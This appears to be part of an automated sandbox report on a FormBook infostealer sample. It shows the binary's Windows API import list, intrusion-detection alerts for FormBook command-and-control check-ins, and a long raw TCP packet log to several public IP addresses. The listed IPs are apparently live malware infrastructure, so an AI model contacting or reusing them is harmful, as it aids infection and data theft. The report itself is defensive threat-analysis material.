KERNEL32.dll | GetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
USER32.dll | SetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
ADVAPI32.dll | RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
12/07/23-13:45:53.892265 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49756 | 80 | 192.168.2.8 | 144.217.103.3
12/07/23-13:43:25.108484 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49720 | 80 | 192.168.2.8 | 69.57.161.215
12/07/23-13:44:20.591294 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49732 | 80 | 192.168.2.8 | 64.190.62.22
12/07/23-13:43:07.624786 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49716 | 80 | 192.168.2.8 | 173.231.241.132
12/07/23-13:45:31.302057 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49752 | 80 | 192.168.2.8 | 208.91.197.27
12/07/23-13:44:49.247971 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49740 | 80 | 192.168.2.8 | 162.240.81.18
12/07/23-13:42:23.852123 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49707 | 80 | 192.168.2.8 | 84.32.84.32
12/07/23-13:44:05.771412 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49728 | 80 | 192.168.2.8 | 217.144.107.2
12/07/23-13:45:17.103098 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49748 | 80 | 192.168.2.8 | 84.32.84.32
12/07/23-13:45:02.926842 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49744 | 80 | 192.168.2.8 | 68.178.195.71
12/07/23-13:43:39.597890 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49724 | 80 | 192.168.2.8 | 194.58.112.174
12/07/23-13:44:35.378384 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49736 | 80 | 192.168.2.8 | 207.244.126.150
12/07/23-13:42:53.053398 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49711 | 80 | 192.168.2.8 | 103.210.56.141
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                      Dec 7, 2023 13:42:54.192111969 CET8049711103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:54.192141056 CET8049711103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:54.192344904 CET4971180192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:54.192537069 CET4971180192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:55.065505028 CET8049711103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:55.065689087 CET4971180192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:55.190628052 CET4971180192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:57.190618038 CET4971180192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:57.597151041 CET8049711103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:59.447810888 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:42:59.598661900 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:59.598898888 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:42:59.599157095 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:42:59.749980927 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:01.112714052 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:01.303152084 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.128683090 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:02.280416965 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.280596018 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:02.280976057 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:02.403894901 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.403976917 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:02.432389021 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.462188005 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.462392092 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:02.516972065 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.516997099 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.517035961 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.517107964 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.517122984 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.517173052 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:02.517173052 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:02.517173052 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:02.517198086 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.517218113 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.517224073 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:02.517237902 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:02.517256021 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:02.517333031 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.517369032 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:03.784569025 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:03.975569963 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:04.800529957 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:04.951471090 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:04.951705933 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:04.952063084 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:05.103254080 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.103312969 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.393357038 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.393379927 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.393467903 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.393611908 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:05.393858910 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:05.393858910 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:05.456545115 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.456645012 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:05.458424091 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.458472013 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.458484888 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:05.458513975 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:05.458542109 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.458580971 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.458600044 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:05.458640099 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:05.458668947 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.458709002 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:05.458714008 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.458755016 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.392672062 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.392689943 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.392869949 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.416621923 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.418684006 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.418699980 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.418751001 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.418826103 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.418838978 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.418850899 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.418863058 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.418865919 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.418875933 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.418915987 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.418929100 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.456338882 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.545614004 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.545640945 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.545733929 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.545747995 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.545773029 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.545788050 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.545814991 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.571490049 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.571573973 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.571613073 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.571640968 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.571743965 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.571758986 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.571795940 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.572577953 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.572616100 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.572761059 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.572813988 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.572930098 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.572962999 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.573110104 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.573122025 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.573133945 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.573142052 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.573164940 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.573297977 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.573311090 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.573334932 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.573363066 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.573479891 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.573492050 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.573513985 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.573529959 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.573537111 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.573574066 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.573730946 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.573765039 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:07.472419024 CET4971680192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:07.624366999 CET8049716173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:07.624517918 CET4971680192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:07.624785900 CET4971680192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:07.776628017 CET8049716173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:11.453655958 CET8049716173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:11.494385004 CET8049716173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:11.494549990 CET8049716173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:11.494580030 CET4971680192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:11.494736910 CET4971680192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:11.494813919 CET4971680192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:11.646291018 CET8049716173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:16.748989105 CET4971780192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:16.946090937 CET804971769.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:16.946254015 CET4971780192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:16.946492910 CET4971780192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:17.142756939 CET804971769.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:17.232382059 CET804971769.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:17.232449055 CET804971769.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:17.232513905 CET4971780192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:18.456422091 CET4971780192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:19.472553968 CET4971880192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:19.669651031 CET804971869.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:19.669878006 CET4971880192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:19.670157909 CET4971880192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:19.868004084 CET804971869.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:19.962165117 CET804971869.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:19.962187052 CET804971869.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:19.962243080 CET4971880192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:21.175136089 CET4971880192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:44:21.102833986 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:21.102874041 CET4973280192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:21.102901936 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:21.103008986 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:21.103054047 CET4973280192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:21.103101015 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:21.103142977 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:21.103272915 CET4973280192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:21.103485107 CET4973280192.168.2.864.190.62.22
                                                                                                                      Dec 7, 2023 13:44:21.346287012 CET804973264.190.62.22192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:27.177666903 CET4973380192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:27.335283041 CET8049733207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:27.335448980 CET4973380192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:27.335797071 CET4973380192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:27.491251945 CET8049733207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:27.496795893 CET8049733207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:27.496902943 CET8049733207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:27.497009039 CET4973380192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:28.846960068 CET4973380192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:29.862961054 CET4973480192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:30.018623114 CET8049734207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:30.018739939 CET4973480192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:30.018948078 CET4973480192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:30.174422026 CET8049734207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:30.181188107 CET8049734207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:30.181392908 CET8049734207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:30.181456089 CET4973480192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:31.534394979 CET4973480192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:32.550323963 CET4973580192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:32.705632925 CET8049735207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:32.705734015 CET4973580192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:32.706060886 CET4973580192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:32.861320019 CET8049735207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:32.861427069 CET8049735207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:32.867677927 CET8049735207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:32.867700100 CET8049735207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:32.867810965 CET4973580192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:34.206327915 CET4973580192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:35.222606897 CET4973680192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:35.377962112 CET8049736207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:35.378134966 CET4973680192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:35.378384113 CET4973680192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:35.541174889 CET8049736207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:35.550909042 CET8049736207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:35.552335024 CET8049736207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:35.552418947 CET4973680192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:35.552459002 CET4973680192.168.2.8207.244.126.150
                                                                                                                      Dec 7, 2023 13:44:35.707710981 CET8049736207.244.126.150192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:40.888748884 CET4973780192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:41.085009098 CET8049737162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:41.085102081 CET4973780192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:41.085377932 CET4973780192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:41.281553984 CET8049737162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:41.281639099 CET8049737162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:41.281702995 CET8049737162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:41.281744957 CET8049737162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:41.281810999 CET4973780192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:41.281899929 CET4973780192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:42.596908092 CET4973780192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:43.613791943 CET4973880192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:43.809638023 CET8049738162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:43.809834003 CET4973880192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:43.810091019 CET4973880192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:44.005928993 CET8049738162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:44.006035089 CET8049738162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:44.006094933 CET8049738162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:44.006110907 CET8049738162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:44.006345034 CET4973880192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:44.006345034 CET4973880192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:45.315836906 CET4973880192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:46.331895113 CET4973980192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:46.528038025 CET8049739162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:46.528162003 CET4973980192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:46.528450966 CET4973980192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:46.724680901 CET8049739162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:46.724694014 CET8049739162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:46.724708080 CET8049739162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:46.724741936 CET8049739162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:46.724787951 CET8049739162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:46.724797010 CET4973980192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:46.724833012 CET4973980192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:48.034444094 CET4973980192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:49.050551891 CET4974080192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:49.247123003 CET8049740162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:49.247219086 CET4974080192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:49.247971058 CET4974080192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:49.444348097 CET8049740162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:49.444380999 CET8049740162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:49.444396019 CET8049740162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:49.444408894 CET8049740162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:49.444502115 CET4974080192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:49.445553064 CET4974080192.168.2.8162.240.81.18
                                                                                                                      Dec 7, 2023 13:44:49.642431021 CET8049740162.240.81.18192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:54.589751005 CET4974180192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:54.778505087 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:54.778783083 CET4974180192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:54.779516935 CET4974180192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:54.968569040 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.137350082 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.137650967 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.137667894 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.137686014 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.137706041 CET4974180192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:55.137789965 CET4974180192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:55.137793064 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.137985945 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.138026953 CET4974180192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:55.138133049 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.138209105 CET804974168.178.195.71192.168.2.8
